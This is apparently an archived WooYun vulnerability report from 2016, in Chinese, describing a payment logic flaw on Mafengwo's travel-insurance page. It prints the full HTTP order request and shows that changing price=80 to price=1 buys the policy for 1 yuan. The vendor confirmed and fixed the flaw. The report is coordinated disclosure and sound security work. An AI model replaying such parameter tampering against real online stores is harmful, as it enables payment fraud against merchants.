当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0211806

漏洞标题:马蜂窝主站支付漏洞(1元买保险)

相关厂商:蚂蜂窝

漏洞作者: getshell1993

提交时间:2016-05-23 09:48

修复时间:2016-07-11 10:10

公开时间:2016-07-11 10:10

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-23: 细节已通知厂商并且等待厂商处理中
2016-05-27: 厂商已经确认,细节仅向厂商公开
2016-06-06: 细节向核心白帽子及相关领域专家公开
2016-06-16: 细节向普通白帽子公开
2016-06-26: 细节向实习白帽子公开
2016-07-11: 细节向公众公开

简要描述:

支付漏洞

详细说明:

http://www.mafengwo.cn/insurance/

1.jpg


拿80块这个演示一下

漏洞证明:

1.jpg


1.jpg


POST /insurance/ajax HTTP/1.1
Host: www.mafengwo.cn
Proxy-Connection: keep-alive
Content-Length: 489
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.mafengwo.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.mafengwo.cn/insurance/fill/210264.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: mfw_uuid=56f208b4-0938-04e4-c74d-9935383cf267; __mfwurd=a%3A3%3A%7Bs%3A6%3A%22f_time%22%3Bi%3A1458702519%3Bs%3A9%3A%22f_rdomain%22%3Bs%3A13%3A%22www.baidu.com%22%3Bs%3A6%3A%22f_host%22%3Bs%3A3%3A%22www%22%3B%7D; __mfwuuid=56f208b4-0938-04e4-c74d-9935383cf267; __utma=258432534.1213032865.1458702521.1458702521.1458702521.1; __utmz=258432534.1458702521.1.1.utmcsr=baidu|utmccn=(organic)|utmcmd=organic; login=mafengwo; oad_n=a%3A5%3A%7Bs%3A5%3A%22refer%22%3Bs%3A24%3A%22https%3A%2F%2Fwww.google.co.jp%22%3Bs%3A2%3A%22hp%22%3Bs%3A16%3A%22www.google.co.jp%22%3Bs%3A3%3A%22oid%22%3Bi%3A1075%3Bs%3A2%3A%22dm%22%3Bs%3A15%3A%22www.mafengwo.cn%22%3Bs%3A2%3A%22ft%22%3Bs%3A19%3A%222016-05-20+13%3A44%3A56%22%3B%7D; _r=baidu; _rp=a%3A2%3A%7Bs%3A1%3A%22p%22%3Bs%3A18%3A%22www.baidu.com%2Flink%22%3Bs%3A1%3A%22t%22%3Bi%3A1463846899%3B%7D; PHPSESSID=gdt90nuju2polnm3snuq7vi1c5; mafengwo=da5b36b2bb0a338b4cc9232d9d3ebbd2_54714101_572b3d05ac8252.89806254_572b3d05ac8350.05485005; mfw_uid=54714101; __mfwlv=1463921027; __mfwvn=9; CNZZDATA30065558=cnzz_eid%3D1741414133-1458698913-null%26ntime%3D1463916585; __mfwlt=1463921472; uva=a%3A5%3A%7Bs%3A13%3A%22host_pre_time%22%3Bs%3A10%3A%222016-05-20%22%3Bs%3A2%3A%22lt%22%3Bi%3A1463921473%3Bs%3A10%3A%22last_refer%22%3Bs%3A52%3A%22http%3A%2F%2Fwww.mafengwo.cn%2Finsurance%2Fproduct%2F210264.html%22%3Bs%3A5%3A%22rhost%22%3BN%3Bs%3A4%3A%22step%22%3Bi%3A81%3B%7D; CNZZDATA1253221316=1923141163-1463919301-http%253A%252F%252Fwww.mafengwo.cn%252F%7C1463919301
type=generateOrder&productId=210264&start_date=2016-05-23&end_date=2016-05-27&mdd=%E4%B8%8D%E4%B8%B9&youngNum=0&adultNum=1&oldNum=0&payer_name=%E4%B9%8C%E4%BA%91&payer_identity_type=%E8%BA%AB%E4%BB%BD%E8%AF%81&payer_id=445221********&payer_mobile=13333333333&payer_email=1111%40qq.com&payer_birthday=1998-05-05&name%5B%5D=%E4%B9%8C%E4%BA%91&identity_type%5B%5D=%E8%BA%AB%E4%BB%BD%E8%AF%81&id%5B%5D=445221********&birthday%5B%5D=1998-05-05&mobile%5B%5D=13333333333&price=80&ota_id=2
修改price=1

3.jpg


4.jpg


查看保单 可以看到买到了80元的保险

5.jpg

修复方案:

服务端校验

版权声明:转载请注明来源 getshell1993@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-05-27 10:03

厂商回复:

非常感谢反馈,已经修复。

最新状态:

暂无


漏洞评价:

评价